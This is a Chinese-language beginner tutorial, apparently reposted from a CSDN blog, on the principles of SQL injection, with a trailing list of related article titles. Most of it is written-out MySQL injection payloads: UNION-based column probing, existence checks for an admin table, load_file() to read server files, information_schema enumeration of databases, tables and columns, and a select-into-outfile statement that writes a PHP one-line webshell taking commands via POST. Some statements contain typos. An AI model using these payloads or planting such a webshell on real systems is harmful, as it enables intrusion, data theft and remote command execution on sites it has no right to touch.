黑客攻防之SQL注入原理解析入门教程
原文地址:http://blog.csdn.net/emaste_r/article/details/8156108
出现的关键名词有: UNION SELECT load_file hex
为了方便说明我们先创建两个表:hehe和heihei,很明显它们一个拥有2列属性,一个拥有3列属性
==========================================================================================
一. UNION 的原理
- select * from hehe where id = 3 and exists(select * from admin);
- select * from hehe where id =3 and 1=1 union select 1,2,3;
- select * from hehe where id=3 and exists(select name from hehe);
如图,第一次我们猜解有个列名为name1,报错了,第二次我们猜解列名为name,返回正常,说明真的有个列名为name!
- select * from hehe where id=3 and 1=2 union select 0,0,name from hehe;
- unoin select 1,2,3,4,5,6,7 from hehe;
之类的语句,看看web page上出现的数字为几就把列名填写在第几个列上,如:web page上暴出5,那么我们就把SQL语句改成:
- unoin select 1,2,3,4,name,6,7 from hehe;
然后就能暴出来name的内容啦。。
二.load_file()和UNION 读取服务器文件内容
- select * from hehe where id=3 and 1=2 union select 0,load_file("d:/test.txt"),count(*) from mysql.user;
三 用select into outfile 把一句话木马写进文件
- select '<?php eval($_POST[cmd])?>' into outfile 'c://aa.php';
四.用系统函数+UNOIN暴出数据库的信息(如果web不禁用,极其高效!)
- select * from hehe where id=3 and 1=2 union select 0,0,SCHEMA_NAME from information_schema.SCHEMATA limit 1,2;
- select TABLE_NAME ,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA = "haha"
- select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME= "hehe"l
黑客攻防之SQL注入原理解析入门教程相关推荐
- SQL注入之sqlmap入门教程
目录 一.判断是否存在注入点 二.查询当前用户下所有数据库 三.获取数据库中的表名 四.获取表中的字段名 五.获取字段内容 六.获取数据库的所有用户 七.获取数据库用户的密码 八.获取当前网站数据库的 ...
- SQL注入原理与解决方法
一.什么是sql注入? 1.什么是sql注入呢? 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网 ...
- Java程序员从笨鸟到菜鸟之(一百)sql注入攻击详解(一)sql注入原理详解
前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误.其实sql注入漏洞就是一个.作为一个菜鸟小程 ...
- Web网络安全漏洞分析,SQL注入原理详解
本文主要为大家介绍了Web网络安全漏洞分析SQL注入的原理详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪 一.SQL注入的基础 1.1 介绍SQL注入 SQL注入就是 ...
- SQL注入原理-布尔盲注
小伙伴们大家好,今天为大家带来的使SQL注入原理之布尔盲注. 目录 布尔盲注使用的环境 常用函数与语句 substr()函数 ord()函数 length()函数 实战演示 1.判断是否存在注入点 2 ...
- SQL注入原理以及预防措施
1.SQL注入原理 就是通过利用一些查询语句的漏洞,将SQL语句传递到服务器解析并执行的一种攻击手段.SQL注入是一种注入攻击,可以执行恶意SQL语句.它通过将任意SQL代码插入数据库查询,使攻击者能 ...
- SQL注入原理及预防SQL注入的方法
网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,担心网上的信息以及个人隐私遭到泄露.下面要为大家介绍的是SQL注入,对于sql注入,相信程序员都知道或者使用过,如果没有了解或完全没有听 ...
- sql注入原理及防范方式
前言 sql注入是一种危险系数较高的攻击方式,现在由于我们持久层框架越来越多,大部分框架会处理这个问题,因此导致我们对它的关注度越来越少了.最近部门在整理安全漏洞时,提到了一些关于sql注入的修改点, ...
- 安全架构-SQL注入原理及防范
安全架构系列文章 SQL注入原理及防范 文章目录 安全架构系列文章 前言 一.sql注入是什么? 二.防范方法 1.Java处理 2 .NET处理 总结 前言 一.sql注入是什么? SQL注入是通过 ...
- SQL注入原理及如何判断闭合符
一.SQL注入原理: 造成SQL注入的原因: 在没有对用户的输入进行过滤.检测的情况下,就把用户输入数据,带入到数据库中执行SQL语句. 利用SQL注入: 由于系统没有对输入的数据进行过滤.检测,就带 ...
最新文章
- 算法 求两个自然数的最大公约数 C++
- 来阿里前 vs 来阿里后
- 整理:各个浏览器及web服务器对URL(get)长度的限制
- 【控制】《复杂运动体系统的分布式协同控制与优化》-方浩老师-第2章-基于速度估计的多欧拉-拉格朗日系统分布式控制
- 详解java方法与递归
- MFC启动和关闭线程
- Nodejs-增删改查-案列方法
- linux共享内存 pmu,如何使用gator/streamline 收集PMU perf event计数
- torchtext 各种数据集加载
- 安卓使用html文件遍历,安卓手机中使用html的input file,获取不到文件类型和文件名...
- C标准库stdio源码分析
- python utf 8 mac_Mac python 开发环境一些设置
- 计算机个性化桌面后总是恢复,Win7切换主题导致个性化桌面图标失效恢复初始的解决方法...
- 反转一个英语句子c++
- 数据可视化之大数据平台可视化
- Cocos2D开发的iPhone游戏的教程
- 滴滴程序员被亲戚鄙视:年薪八十万不如二本教书的……
- 随笔目录【2016年12月1日整理中~】
- MATLAB 自带 神经网络工具包
- 2021年A特种设备相关管理(锅炉压力容器压力管道)证考试及A特种设备相关管理(锅炉压力容器压力管道)复审模拟考试